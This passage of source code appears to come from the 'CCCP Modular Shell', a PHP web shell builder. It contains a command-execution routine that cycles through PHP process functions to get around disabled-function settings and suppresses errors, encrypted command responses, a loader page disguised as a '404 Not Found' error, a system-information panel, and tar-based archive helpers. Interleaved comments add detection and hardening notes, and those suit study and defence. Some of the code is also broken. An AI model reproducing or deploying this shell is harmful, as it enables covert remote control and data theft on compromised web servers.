205 | $f = strtolower(substr(strrchr($f, '.'), 1));
206 | $img = array('htaccess', 'asp', 'cgi', 'php', 'html', 'jpg', 'js', 'swf', 'txt',
207 | 'tar', 'mp3', 'avi', 'cmd', 'cpp', 'ini', 'doc', 'exe', 'log', 'pl', 'py', 'xml');
208 |
209 | $imgEquals = array(
210 | 'tar' => array('tar', 'r00', 'ace', 'arj', 'bz', 'bz2', 'tbz', 'tbz2', 'tgz', 'uu', 'xxe', 'zip', 'cab', 'gz', 'iso', 'lha', 'lzh', 'pbk', 'rar', 'uuf', '7z'),
211 | 'php' => array('php', 'php3', 'php4', 'php5', 'phtml', 'shtml'),
212 | 'jpg' => array('jpg', 'gif', 'png', 'jpeg', 'jfif', 'jpe', 'bmp', 'ico', 'tif', 'tiff'),
213 | 'html'=> array('html', 'htm'),
214 | 'avi' => array('avi', 'mov', 'mvi', 'mpg', 'mpeg', 'wmv', 'rm', 'mp4'),
215 | 'lnk' => array('lnk', 'url'),
216 | 'ini' => array('ini', 'css', 'inf'),
217 | 'doc' => array('doc', 'dot', 'wri', 'rtf', 'pdf'),
218 | 'js' => array('js', 'vbs'),
219 | 'cmd' => array('cmd', 'bat', 'pif'),
220 | 'swf' => array('swf', 'fla'),
221 | 'mp3' => array('mp3', 'au', 'midi', 'mid'),
222 | 'htaccess' => array('htaccess', 'htpasswd', 'ht', 'hta', 'so')
223 | );
224 |
225 | if (in_array($f, $img)) $image = $f;
226 | if ($image === 'unk'){
227 | foreach ($imgEquals as $k => $v){
228 | if (in_array($f, $v)){
229 | $image = $k;
230 | break;
231 | }
232 | }
233 | }
234 |
235 | return "";
236 | }
237 |
238 | # General functions
// HTML-escapes $s for output by calling htmlentities() with its default flags.
// SECURITY: before PHP 8.1 the default flag set is ENT_COMPAT, which leaves single
// quotes unescaped, so the result is not safe inside single-quoted attributes.
// The commented-out variant passed 2|1, which equals ENT_QUOTES.
239 | function hsc($s){
240 | //return htmlspecialchars($s, 2|1);
241 | return htmlentities($s);
242 | }
243 |
244 | function fixRoute($r){
245 | return str_replace(array('/', '\\'), DS, $r);
246 | }
247 |
// Runs $e as an operating-system command and returns its captured standard output
// ('' for an empty command).
// It uses the first PHP process-execution function that exists and is not listed in
// the disable_functions ini value, trying in order: exec, shell_exec, system,
// passthru, popen, proc_open.
// Hardening note: the fall-through means that disabling only some of these leaves
// the rest usable. Hosts that do not need process execution from PHP should list
// all six in disable_functions.
// Detection note: every call is prefixed with @, so failures leave no PHP warnings
// in the error log. Process-creation telemetry for the web-server account is the
// more dependable signal.
248 | function execute($e){
249 | if (empty($e)){
250 | return '';
251 | }
252 |
253 | //$e = $e . ' 2>&1';
254 | $dis_func = explode(',', get_cfg_var('disable_functions')); // entries are not trimmed before the in_array() checks below
255 |
256 | if (function_exists('exec') && !in_array('exec', $dis_func)){
257 | @exec($e, $r);
258 | if ($r) {
259 | $r = implode("\n", $r); // exec() returns output as an array of lines
260 | }
261 | } else if (function_exists('shell_exec') && !in_array('shell_exec', $dis_func)){
262 | $r = @shell_exec($e);
263 | } else if (function_exists('system') && !in_array('system', $dis_func)){
264 | @ob_start(); // system() prints directly, so output is captured through an output buffer
265 | @system($e);
266 | $r = @ob_get_contents();
267 | @ob_end_clean();
268 | } else if (function_exists('passthru') && !in_array('passthru', $dis_func)){
269 | @ob_start();
270 | @passthru($e);
271 | $r = @ob_get_contents();
272 | @ob_end_clean();
273 | } else if (function_exists('popen') && !in_array('popen', $dis_func)){
274 | $h = popen($e, 'r');
275 | if (is_rource($h)){ // NOTE(review): is_rource() is not a PHP builtin and is not defined in the visible source
276 | if (function_exists('fread') && function_exists('feof')){
277 | while (!feof($h))
278 | $r .= fread($h, 512);
279 | } else if (function_exists('fgets') && function_exists('feof')){
280 | while (!feof($h))
281 | $r .= fgets($h, 512);
282 | }
283 | }
284 | pclose($h);
285 | } else if (function_exists('proc_open') && !in_array('proc_open', $dis_func)){
286 | $ds = array(1 => array('pipe', 'w')); // only the child's stdout is piped back
287 | //$ds = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
288 | $h = @proc_open($e, $ds, $pipes);
289 | //$h = @proc_open($e, $ds, $pipes, getcwd(), array());
290 | if (is_rource($h)){
291 | if (function_exists('fread') && function_exists('feof')){
292 | while (!feof($pipes[1]))
293 | $r .= fread($pipes[1], 512);
294 | } else if (function_exists('fgets') && function_exists('feof')){
295 | while (!feof($pipes[1]))
296 | $r .= fgets($pipes[1], 512);
297 | /*while (!feof($pipes[2]))
298 | $r .= fgets($pipes[2], 512);*/
299 | }
300 | }
301 | @proc_close($h);
302 | }
303 |
304 | return($r);
305 | }
306 |
// Reports whether command execution appears to be blocked.
// Returns the safe_mode ini value when it is truthy. Otherwise it runs
// `echo abcdef` through execute() and returns true unless "def" is found at
// offset 3 of the output.
// Detection note: this probe makes the web-server account spawn `echo abcdef`,
// a literal string that process-creation auditing on web hosts can match.
307 | function safeStatus(){
308 | $safe_mode = @ini_get('safe_mode');
309 | if (!$safe_mode && strpos(execute('echo abcdef'), 'def') != 3) $safe_mode = true;
310 | return $safe_mode;
311 | }
312 |
313 | function getcfg($n){
314 | $result = get_cfg_var($n);
315 | if ($result == 0) return tText('no', 'no');
316 | else if ($result == 1) return tText('yes', 'yes');
317 | else return $result;
318 | }
319 |
320 | function sizecount($s){
321 | if ($s[0] === '*') return $s;
322 | $sizename = array(' B', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
323 | return @round( $s / pow(1024, ($i = floor(log($s, 1024)))), 2) . $sizename[$i];
324 | }
325 |
326 | function getPath($s, $n){
327 | if ($n === '.') $n = $s;
328 | if (substr($n, -1) !== DS) $n = $n . DS;
329 | return $n;
330 | }
331 |
332 | function getUpPath($n){
333 | $pathdb = explode(DS, $n);
334 | $num = count($pathdb);
335 | if ($num > 2) unset($pathdb[$num - 1], $pathdb[$num - 2]);
336 | $uppath = implode(DS, $pathdb) . DS;
337 | return $uppath;
338 | }
339 |
340 | function get_all_files($path){
341 | $files = glob(realpath($path).DS.'*');
342 | foreach ($variable as $value) {
343 | if (is_dir($value)){
344 | $subdir = glob($value.DS.'*');
345 | if (is_array($files) && is_array($subdir)) $files = array_merge($files, $subdir);
346 | }
347 | }
348 | return $files;
349 | }
350 |
// Sends $i back to the client and ends the script: the text is encrypted with
// rc4encrypt() under $config['sPass'], base64-encoded and passed to exit().
// Defender note: responses produced here are a bare base64 string with no markup.
// They are encrypted with the same static key as the requests, so recovering the
// key decodes both directions of a capture.
351 | function sAjax($i){
352 | global $config;
353 | exit(base64_encode(rc4encrypt($i, $config['sPass'])));
354 | }
355 |
356 | function sDialog($i){
357 | return "
$i
";
358 | }
359 |
/**
 * True when $v is set (not null) and is not the empty string.
 */
function sValid($v){
    if (!isset($v)) {
        return false;
    }
    return $v !== '';
}
363 |
/**
 * Return the size of $file, switching to a formatted string for large or
 * negative results.
 *
 * When filesize() reports more than 1610612736 bytes (1.5 GiB) or less than -1,
 * the value is reinterpreted as unsigned with sprintf("%u") and returned as a
 * human-readable string prefixed with "* ". Otherwise the raw filesize() result
 * is returned unchanged, so callers receive either an int/false or a string.
 *
 * The block comment inside the branch is disabled code: three alternative ways
 * of measuring the file (a shell command through execute(), the Windows
 * Scripting.FileSystemObject COM object, and a seek-based probe). None of it
 * runs.
 *
 * @param string $file Path of the file to measure.
 * @return int|string|false
 */
function filesize64($file){
    $size = filesize($file);
    if ($size > 1610612736 or $size < -1){
        /*
        global $isWIN;
        $size = 0;
        if (!safeStatus()){
        $cmd = ($isWIN) ? "for %F in (\"$file\") do @echo %~zF" : "stat -c%s \"$file\"";
        execute($cmd, $output);
        ctype_digit($size = trim($output));
        }

        if ($isWIN && class_exists("COM")){
        try {
        $fsobj = new COM('Scripting.FileSystemObject');
        $f = $fsobj->GetFile(realpath($file));
        $size = $f->Size;
        } catch (Exception $e){}
        }

        $piece = 1073741824;
        $fp = @fopen($file, 'r');
        @fseek($fp, 0, SEEK_SET);
        while ($piece > 1){
        @fseek($fp, $piece, SEEK_CUR);
        if (@fgetc($fp) === false){
        @fseek($fp, -$piece, SEEK_CUR);
        $piece = (int)($piece / 2);
        } else {
        @fseek($fp, -1, SEEK_CUR);
        $size += $piece;
        }
        }

        while (@fgetc($fp) !== false)
        $size++;

        @fclose($file_pointer);
        */
        // Reinterpret a wrapped (negative) value as an unsigned decimal string.
        $size = sprintf("%u", $size);
        $sizename = array(' B', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
        // $i is the power of 1024 that fits the size; it also selects the unit label.
        $size = '* ' . @round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
    }

    return $size;
}
410 |
--------------------------------------------------------------------------------
/builder/base/loader.js:
--------------------------------------------------------------------------------
/**
 * RC4 key schedule: build the 256-entry permutation for `key`.
 *
 * The array starts as 0..255 and is shuffled with one pass that mixes in the
 * key's character codes, repeating the key as needed (i % keylength).
 *
 * Review notes:
 *  - j, box, keylength, i and tmp are assigned without var/let, so they are
 *    implicit globals shared with every other function in this file.
 *  - RC4 is a deprecated stream cipher (RFC 7465 prohibits it in TLS); this is
 *    obfuscation-grade protection, not a sound confidentiality mechanism.
 *
 * @param {string} key Key material, read one character code at a time.
 * @returns {number[]} The initial permutation, to be passed to rc4().
 */
function rc4Init(key) {
    j = 0;
    box = [];
    keylength = key.length;

    // Identity permutation.
    for (i = 0; i < 256; i++) {
        box[i] = i;
    }

    // Key-dependent shuffle.
    for (i = 0; i < 256; i++) {
        j = (j + box[i] + key.charCodeAt(i % keylength)) % 256;
        tmp = box[i];
        box[i] = box[j];
        box[j] = tmp;
    }

    return box;
}
19 |
/**
 * RC4 keystream generation and XOR over `data`.
 *
 * Each character code of `data` is XORed with the next keystream byte and the
 * result is appended as a character. Because the operation is an XOR, the same
 * call is used for both directions.
 *
 * Review notes:
 *  - `box` is modified in place; a second call with the same array starts from
 *    the swapped state left by the first one, although i and j restart at 0.
 *  - i, j, res, datalength, y and tmp are implicit globals (no var/let).
 *
 * @param {string} data Input string, processed one character code at a time.
 * @param {number[]} box Permutation produced by rc4Init(); mutated.
 * @returns {string} Output string of the same length as `data`.
 */
function rc4(data, box) {
    i = 0;
    j = 0;
    res = '';
    datalength = data.length;
    for (y = 0; y < datalength; y++) {
        i = (i + 1) % 256;
        j = (j + box[i]) % 256;
        tmp = box[i];
        box[i] = box[j];
        box[j] = tmp;
        res += String.fromCharCode(data.charCodeAt(y) ^ box[(box[i] + box[j]) % 256]);
    }

    return res;
}
36 |
37 | //MD5 - DSR!
/**
 * Add two numbers and wrap the result to a signed 32-bit integer.
 *
 * @param {number} a
 * @param {number} b
 * @returns {number} (a + b) reduced to 32 bits.
 */
function add32(a, b) {
    var sum = a + b;
    return sum & 0xFFFFFFFF;
}
41 |
/**
 * Shared MD5 step: add q, a, x and t modulo 2^32, rotate the sum left by s
 * bits, then add b.
 *
 * @param {number} q Output of the round's boolean function.
 * @param {number} a State word being updated.
 * @param {number} b State word added after the rotation.
 * @param {number} x Message word.
 * @param {number} s Left-rotation amount in bits.
 * @param {number} t Round constant.
 * @returns {number} New value for the state word.
 */
function cmn(q, a, b, x, s, t) {
    var mixed = add32(add32(a, q), add32(x, t));
    var rotated = (mixed << s) | (mixed >>> (32 - s));
    return add32(rotated, b);
}
46 |
/**
 * MD5 round-1 step: boolean function (b AND c) OR (NOT b AND d), then cmn().
 */
function ff(a, b, c, d, x, s, t) {
    var f = (b & c) | ((~b) & d);
    return cmn(f, a, b, x, s, t);
}
50 |
/**
 * MD5 round-2 step: boolean function (b AND d) OR (c AND NOT d), then cmn().
 */
function gg(a, b, c, d, x, s, t) {
    var g = (b & d) | (c & (~d));
    return cmn(g, a, b, x, s, t);
}
54 |
/**
 * MD5 round-3 step: boolean function b XOR c XOR d, then cmn().
 */
function hh(a, b, c, d, x, s, t) {
    var h = b ^ c ^ d;
    return cmn(h, a, b, x, s, t);
}
58 |
/**
 * MD5 round-4 step: boolean function c XOR (b OR NOT d), then cmn().
 */
function ii(a, b, c, d, x, s, t) {
    var mix = c ^ (b | (~d));
    return cmn(mix, a, b, x, s, t);
}
62 |
/**
 * Process one 16-word block and fold it into the 4-word state.
 *
 * Runs four groups of sixteen steps (ff, gg, hh, ii) over the message words
 * k[0..15] and then adds the result back into x[0..3] with add32(). The state
 * array is updated in place; nothing is returned.
 *
 * Review note: a, b, c and d are assigned without var/let and are therefore
 * implicit globals.
 *
 * @param {number[]} x Four-word running state; modified in place.
 * @param {number[]} k Sixteen message words for this block.
 */
function md5cycle(x, k) {
    a = x[0];
    b = x[1];
    c = x[2];
    d = x[3];

    // Round 1 (ff)
    a = ff(a, b, c, d, k[0], 7, -680876936);
    d = ff(d, a, b, c, k[1], 12, -389564586);
    c = ff(c, d, a, b, k[2], 17, 606105819);
    b = ff(b, c, d, a, k[3], 22, -1044525330);
    a = ff(a, b, c, d, k[4], 7, -176418897);
    d = ff(d, a, b, c, k[5], 12, 1200080426);
    c = ff(c, d, a, b, k[6], 17, -1473231341);
    b = ff(b, c, d, a, k[7], 22, -45705983);
    a = ff(a, b, c, d, k[8], 7, 1770035416);
    d = ff(d, a, b, c, k[9], 12, -1958414417);
    c = ff(c, d, a, b, k[10], 17, -42063);
    b = ff(b, c, d, a, k[11], 22, -1990404162);
    a = ff(a, b, c, d, k[12], 7, 1804603682);
    d = ff(d, a, b, c, k[13], 12, -40341101);
    c = ff(c, d, a, b, k[14], 17, -1502002290);
    b = ff(b, c, d, a, k[15], 22, 1236535329);

    // Round 2 (gg)
    a = gg(a, b, c, d, k[1], 5, -165796510);
    d = gg(d, a, b, c, k[6], 9, -1069501632);
    c = gg(c, d, a, b, k[11], 14, 643717713);
    b = gg(b, c, d, a, k[0], 20, -373897302);
    a = gg(a, b, c, d, k[5], 5, -701558691);
    d = gg(d, a, b, c, k[10], 9, 38016083);
    c = gg(c, d, a, b, k[15], 14, -660478335);
    b = gg(b, c, d, a, k[4], 20, -405537848);
    a = gg(a, b, c, d, k[9], 5, 568446438);
    d = gg(d, a, b, c, k[14], 9, -1019803690);
    c = gg(c, d, a, b, k[3], 14, -187363961);
    b = gg(b, c, d, a, k[8], 20, 1163531501);
    a = gg(a, b, c, d, k[13], 5, -1444681467);
    d = gg(d, a, b, c, k[2], 9, -51403784);
    c = gg(c, d, a, b, k[7], 14, 1735328473);
    b = gg(b, c, d, a, k[12], 20, -1926607734);

    // Round 3 (hh)
    a = hh(a, b, c, d, k[5], 4, -378558);
    d = hh(d, a, b, c, k[8], 11, -2022574463);
    c = hh(c, d, a, b, k[11], 16, 1839030562);
    b = hh(b, c, d, a, k[14], 23, -35309556);
    a = hh(a, b, c, d, k[1], 4, -1530992060);
    d = hh(d, a, b, c, k[4], 11, 1272893353);
    c = hh(c, d, a, b, k[7], 16, -155497632);
    b = hh(b, c, d, a, k[10], 23, -1094730640);
    a = hh(a, b, c, d, k[13], 4, 681279174);
    d = hh(d, a, b, c, k[0], 11, -358537222);
    c = hh(c, d, a, b, k[3], 16, -722521979);
    b = hh(b, c, d, a, k[6], 23, 76029189);
    a = hh(a, b, c, d, k[9], 4, -640364487);
    d = hh(d, a, b, c, k[12], 11, -421815835);
    c = hh(c, d, a, b, k[15], 16, 530742520);
    b = hh(b, c, d, a, k[2], 23, -995338651);

    // Round 4 (ii)
    a = ii(a, b, c, d, k[0], 6, -198630844);
    d = ii(d, a, b, c, k[7], 10, 1126891415);
    c = ii(c, d, a, b, k[14], 15, -1416354905);
    b = ii(b, c, d, a, k[5], 21, -57434055);
    a = ii(a, b, c, d, k[12], 6, 1700485571);
    d = ii(d, a, b, c, k[3], 10, -1894986606);
    c = ii(c, d, a, b, k[10], 15, -1051523);
    b = ii(b, c, d, a, k[1], 21, -2054922799);
    a = ii(a, b, c, d, k[8], 6, 1873313359);
    d = ii(d, a, b, c, k[15], 10, -30611744);
    c = ii(c, d, a, b, k[6], 15, -1560198380);
    b = ii(b, c, d, a, k[13], 21, 1309151649);
    a = ii(a, b, c, d, k[4], 6, -145523070);
    d = ii(d, a, b, c, k[11], 10, -1120210379);
    c = ii(c, d, a, b, k[2], 15, 718787259);
    b = ii(b, c, d, a, k[9], 21, -343485551);

    // Fold this block's result into the running state.
    x[0] = add32(a, x[0]);
    x[1] = add32(b, x[1]);
    x[2] = add32(c, x[2]);
    x[3] = add32(d, x[3]);
}
142 |
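/**
 * Compute the MD5 digest of a string and return it as lowercase hex.
 *
 * Full 64-character blocks are processed first; the remainder is padded with
 * 0x80, zero words and the bit length, then processed as the final block(s).
 * Input is read with charCodeAt(), so each character is treated as one byte.
 *
 * The loop counter and working arrays are declared locally. As implicit
 * globals, the block loop's `i` was shared with md5blk(), which resets it on
 * every call, so inputs of 128 characters or more never advanced past the
 * second block. The unused `txt` assignment is dropped.
 *
 * MD5 is not collision-resistant and is unsuitable for password storage.
 *
 * @param {string} s Input string.
 * @returns {string} 32-character hexadecimal digest.
 */
function md5(s) {
    var n = s.length;
    var state = [1732584193, -271733879, -1732584194, 271733878];
    var tail = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
    var i;

    // Whole 64-character blocks.
    for (i = 64; i <= s.length; i += 64) {
        md5cycle(state, md5blk(s.substring(i - 64, i)));
    }

    // Remaining characters, packed little-endian into the tail words.
    s = s.substring(i - 64);
    for (i = 0; i < s.length; i++) {
        tail[i >> 2] |= s.charCodeAt(i) << ((i % 4) << 3);
    }
    tail[i >> 2] |= 0x80 << ((i % 4) << 3);

    // No room left for the length field: flush and start a fresh block.
    if (i > 55) {
        md5cycle(state, tail);
        for (i = 0; i < 16; i++) tail[i] = 0;
    }

    tail[14] = n * 8;
    md5cycle(state, tail);
    return hex(state);
}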
163 |
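/**
 * Pack a 64-character block into sixteen little-endian 32-bit words.
 *
 * The counter and result array are local. The original assigned them without
 * var, which overwrote the global `i` that md5() uses as its block counter.
 *
 * @param {string} s Exactly 64 characters; each is read with charCodeAt().
 * @returns {number[]} Sixteen words, four characters per word.
 */
function md5blk(s) {
    var md5blks = [];
    var i;
    for (i = 0; i < 64; i += 4) {
        md5blks[i >> 2] = s.charCodeAt(i) + (s.charCodeAt(i + 1) << 8) + (s.charCodeAt(i + 2) << 16) + (s.charCodeAt(i + 3) << 24);
    }

    return md5blks;
}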
171 |
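/**
 * Convert an array of 32-bit words to a hex string, least significant byte
 * of each word first.
 *
 * Each element of `x` is replaced in place by its 8-character hex form before
 * the array is joined, so the caller's array is modified (as in the original).
 * The counters and scratch string are local rather than implicit globals.
 *
 * @param {number[]} x Words to encode; overwritten with strings.
 * @returns {string} Concatenated lowercase hex.
 */
function hex(x) {
    var hex_chr = '0123456789abcdef'.split('');
    var i, j, s;
    for (i = 0; i < x.length; i++) {
        s = '';
        for (j = 0; j < 4; j++) {
            s += hex_chr[(x[i] >> (j * 8 + 4)) & 0x0F] + hex_chr[(x[i] >> (j * 8)) & 0x0F];
        }
        x[i] = s;
    }
    return x.join('');
}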
182 |
/**
 * Build a string of `l` characters from base-36 renderings of Math.random().
 *
 * Review notes:
 *  - Math.random() is not a cryptographically secure generator; how the
 *    result is used is not visible in this file.
 *  - `s` is assigned without var/let and is an implicit global.
 *
 * @param {number} l Desired length.
 * @returns {string} Characters drawn from 0-9 and a-z.
 */
function randStr(l) {
    s = "";
    while(s.length < l)
        s += Math.random().toString(36).slice(2); // drop the leading "0."

    return s.substr(0, l);
}
--------------------------------------------------------------------------------
/builder/base/loader.php:
--------------------------------------------------------------------------------
1 |
2 |
3 | 404 Not Found
4 |
49 |
50 | Not Found
51 | The requested URL was not found on this server.
52 |
53 |
54 |
55 |
--------------------------------------------------------------------------------
/builder/base/theme.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 | CCCP Modular Shell
10 |
15 |
18 |
19 |
20 |
21 |
22 |
23 |
24 | CCCP Modular Shell
25 | |
26 |
27 |
28 |
29 | Software: ' . $_SERVER['SERVER_SOFTWARE'] . '
30 | uname -a: ' . php_uname() . '
31 | Safe-mode: ' . getcfg('safe_mode') . '
32 | {{_MENU_}}
33 | |
34 |
35 |
36 | |
37 |
38 |
39 |
40 | --[ CCCP Modular Shell v1.0 by DSR! | Generation time: 0.00 ]--
41 |
42 |
43 |
--------------------------------------------------------------------------------
/builder/base/zip.php:
--------------------------------------------------------------------------------
1 | cut_from_route = strlen(dirname($basedir . $filelist[0])) + 1;
12 | foreach ($filelist as $f){
13 | $f = $basedir . $f;
14 | if (is_dir($f))
15 | $this->AddFolderContent($f);
16 | else if (is_file($f))
17 | $this->addFileProc($f);
18 | }
19 | }
20 |
/**
 * Walk $dir recursively and add every regular file found to the archive.
 *
 * Entries are joined as $dir . $f with no separator, so $dir is expected to end
 * with one; the recursive call appends DS for that reason. Errors from
 * opendir()/readdir() are suppressed with @.
 *
 * @param string $dir Directory path ending with a separator.
 * @return false|null false when $dir does not exist; otherwise no value.
 */
function AddFolderContent($dir){
    if (!file_exists($dir))
        return false;

    $h = @opendir($dir);
    while (false !== ($f = @readdir($h))) {
        if ($f === '.' || $f === '..')
            continue;

        $f = $dir . $f;
        if (is_dir($f))
            $this->AddFolderContent($f . DS);
        else if (is_file($f))
            $this->addFileProc($f);
    }
    @closedir($h);
}
38 |
/**
 * Read one file from disk and add it to the archive.
 *
 * The whole file is loaded into memory with file_get_contents(). The name
 * stored in the archive is the path with its first $this->cut_from_route
 * characters removed.
 *
 * @param string $file Path of the file to add.
 * @return false|null false when the file does not exist; otherwise no value.
 */
function addFileProc($file){
    if (!file_exists($file))
        return false;

    $this->addFile(file_get_contents($file), substr($file, $this->cut_from_route));
}
45 |
/**
 * Convert a Unix timestamp to the packed 32-bit DOS date/time value.
 *
 * A timestamp of 0 means "now". Dates before 1980 are clamped to
 * 1980-01-01 00:00:00. Seconds are stored at two-second resolution.
 *
 * @param int $t Unix timestamp, or 0 for the current time.
 * @return int Packed value: year-1980, month, day, hours, minutes, seconds/2.
 */
function unix2DosTime($t = 0){
    if ($t == 0) {
        $parts = getdate();
    } else {
        $parts = getdate($t);
    }

    if ($parts['year'] < 1980) {
        $parts = array('year' => 1980, 'mon' => 1, 'mday' => 1, 'hours' => 0, 'minutes' => 0, 'seconds' => 0);
    }

    $datePart = (($parts['year'] - 1980) << 25) | ($parts['mon'] << 21) | ($parts['mday'] << 16);
    $timePart = ($parts['hours'] << 11) | ($parts['minutes'] << 5) | ($parts['seconds'] >> 1);

    return $datePart | $timePart;
}
51 |
/**
 * Decode a string of hex digit pairs into raw bytes.
 *
 * Review notes:
 *  - The $s{$i} curly-brace string offset syntax was deprecated in PHP 7.4
 *    and removed in PHP 8.0.
 *  - The do/while body runs once before the length check, so an empty $s
 *    still reads offsets 0 and 1.
 *
 * @param string $s Hex digits; processed two characters at a time.
 * @return string Decoded bytes.
 */
function hex2bin($s){
    $bin = '';
    $i = 0;
    do {
        $bin .= chr(hexdec($s{$i}.$s{($i + 1)}));
        $i += 2;
    } while ($i < strlen($s));
    return $bin;
}
61 |
/**
 * Append one entry to the in-memory ZIP being built.
 *
 * Builds the local file header, compressed data and trailing size/CRC record
 * into $this->datasec, and the matching central directory record into
 * $this->ctrl_dir. $this->old_offset and $this->file_count are advanced so
 * file() can write the end-of-archive record.
 *
 * @param string $data Uncompressed file contents.
 * @param string $name Entry name stored in the archive.
 * @param int    $time Unix timestamp for the entry; 0 means now.
 */
function addFile($data, $name, $time = 0){
    $dtime = dechex($this->unix2DosTime($time));
    // Reverse the four hex byte pairs so the DOS time is stored little-endian.
    $hexdtime = $this->hex2bin($dtime[6] . $dtime[7] . $dtime[4] . $dtime[5] . $dtime[2] . $dtime[3] . $dtime[0] . $dtime[1]);
    $packv0 = pack('v', 0);
    $zdata = gzcompress($data);
    // Drop the first 2 and last 4 bytes of the gzcompress() output, keeping the middle.
    $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);

    // "local file header" segment
    $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00" . $hexdtime;
    // CRC-32 of the original data, compressed length, uncompressed length.
    $pack_info = pack('V', crc32($data)) . pack('V', strlen($zdata)) . pack('V', strlen($data));

    $fr .= $pack_info . pack('v', strlen($name)) . $packv0 . $name;
    $fr .= $zdata; // "file data" segment
    $fr .= $pack_info; // "data descriptor" segment
    $this->datasec[] = $fr;

    // now add to central directory record
    $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00" . $hexdtime;
    $cdrec .= $pack_info . pack('v', strlen($name)) . $packv0 . $packv0 . $packv0 . $packv0 . pack('V', 32);
    // Offset of this entry's local header from the start of the archive.
    $cdrec .= pack('V', $this->old_offset) . $name;

    // save to central directory
    $this->old_offset += strlen($fr);
    $this->file_count += 1;
    $this->ctrl_dir[] = $cdrec;
}
88 |
/**
 * Assemble the complete archive as one string.
 *
 * Concatenates every entry from $this->datasec, then the central directory
 * from $this->ctrl_dir, then the end-of-central-directory record carrying the
 * entry count (twice), the directory size and the directory offset.
 *
 * @return string Archive bytes held entirely in memory.
 */
function file(){
    $data = implode('', $this->datasec);
    $ctrldir = implode('', $this->ctrl_dir);
    return $data . $ctrldir . "\x50\x4b\x05\x06\x00\x00\x00\x00" . pack('v', $this->file_count) . pack('v', $this->file_count) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . " ";
}
94 |
/**
 * Write the assembled archive to disk.
 *
 * @param string $file Destination path.
 * @return int|false Bytes written, or false on failure (from file_put_contents()).
 */
function output($file){
    $archiveBytes = $this->file();
    return file_put_contents($file, $archiveBytes);
}
98 | }
99 |
/**
 * Create a ZIP archive from files and directories using the zip extension.
 *
 * Each path has the current working directory (get_cwd(), defined elsewhere)
 * stripped and backslashes normalised. Directories are walked recursively and
 * stored relative to the directory itself; single files are stored by basename.
 * File contents come from read_file(), which is defined outside this block.
 *
 * Review notes:
 *  - ZipArchive::open() returns true on success and an integer error code on
 *    failure, so the !$zip->open(...) test does not catch a failed open.
 *  - When getStatusString() is not false the function returns before
 *    $zip->close() is reached; on the other path close() runs and no value is
 *    returned.
 *
 * @param string|array $files   Path or list of paths to add.
 * @param string       $archive Destination archive path.
 * @return bool|null
 */
function zip($files, $archive){
    if(!extension_loaded('zip')) return false;
    $zip = new ZipArchive();
    // Mode 1 is ZipArchive::CREATE.
    if(!$zip->open($archive, 1)) return false;

    if(!is_array($files)) $files = array($files);
    foreach($files as $file){
        $file = str_replace(get_cwd(), '', $file);
        $file = str_replace('\\', '/', $file);
        if(is_dir($file)){
            // Mode 1 is RecursiveIteratorIterator::SELF_FIRST (parents before children).
            $filesIterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($file), 1);
            foreach($filesIterator as $iterator){
                $iterator = str_replace('\\', '/', $iterator);
                if(in_array(substr($iterator, strrpos($iterator, '/')+1), array('.', '..'))) continue;
                if(is_dir($iterator)) $zip->addEmptyDir(str_replace($file.'/', '', $iterator.'/'));
                else if(is_file($iterator)) $zip->addFromString(str_replace($file.'/', '', $iterator), read_file($iterator));
            }
        } else if(is_file($file))
            $zip->addFromString(basename($file), read_file($file));
    }
    if($zip->getStatusString()!==false) return true;
    $zip->close();
}
123 |
/**
 * Create an archive of $files, either through zip() or by running tar.
 *
 * The tar branch reduces the archive and every file to its basename, quotes
 * the names with wrap_with_quotes() (defined elsewhere) and hands a command
 * line to execute() (defined elsewhere). Success is judged by whether the
 * archive file exists afterwards.
 *
 * Review notes:
 *  - The command is built as 'tar ' . $command . 'czf "..."', so the mode
 *    letters chosen in $command are followed by a second literal "czf".
 *  - The else { //TODO } attaches to the inner if (zip(...)), not to the
 *    class_exists() check; a failed or unavailable zip falls through to
 *    return false.
 *  - Analyst note: this path runs an external tar process from the PHP
 *    process, which is visible in process-creation telemetry.
 *
 * @param string       $type    'zip', 'tar' or 'targz'.
 * @param string       $archive Destination archive path.
 * @param string|array $files   Path or list of paths to include.
 * @return bool
 */
function compress($type, $archive, $files){
    if (!is_array($files)) $files = array($files);
    if ($type=='zip'){
        if(class_exists('ZipArchive'))
            if (zip($files, $archive)) return true;
            else {
                //TODO
            }
    } else if ($type=='tar' || $type=='targz') {
        $archive = basename($archive);
        $listsBasename = array_map('basename', $files);
        $lists = array_map('wrap_with_quotes', $listsBasename);
        $command = ($type == 'targz' ? 'czf' : 'cf');
        execute('tar '.$command.'czf "'.$archive.'" '.implode(' ', $lists));
        return is_file($archive);
    }
    return false;
}
142 |
/**
 * Extract an archive into a directory named after it, under $path.
 *
 * The function changes the process working directory to $path with chdir().
 * ZIP archives are extracted with ZipArchive; tar archives are extracted by
 * running tar through execute() (defined elsewhere), and success is inferred
 * from a change in the file count reported by get_all_files().
 *
 * Review notes:
 *  - The tar branch is entered for $type 'tar' or 'targz' but selects its
 *    flags by comparing $type with 'untargz', which cannot match there, so
 *    'xf' is always used.
 *  - ZipArchive::open() returns an integer error code on failure, which is
 *    truthy, so if($zip->open($archive)) does not detect a failed open.
 *  - socket-free but process-spawning: the tar path appears as a child
 *    process of the PHP process.
 *
 * @param string $type    'unzip', 'tar' or 'targz'.
 * @param string $archive Archive file name.
 * @param string $path    Directory to extract under.
 * @return bool
 */
function decompress($type, $archive, $path){
    $path = realpath($path).DS;
    if(is_dir($path)){
        chdir($path);
        if($type=='unzip'){
            if(class_exists('ZipArchive')){
                $zip = new ZipArchive();
                $target = $path.basename($archive,'.zip');
                if($zip->open($archive)){
                    if(!is_dir($target)) mkdir($target);
                    $zip->extractTo($target); //return true;
                    return $zip->close();
                }
            }
        } else if ($type=='tar' || $type=='targz') {
            // Target directory name is the archive name without its tar suffix.
            $target = '';
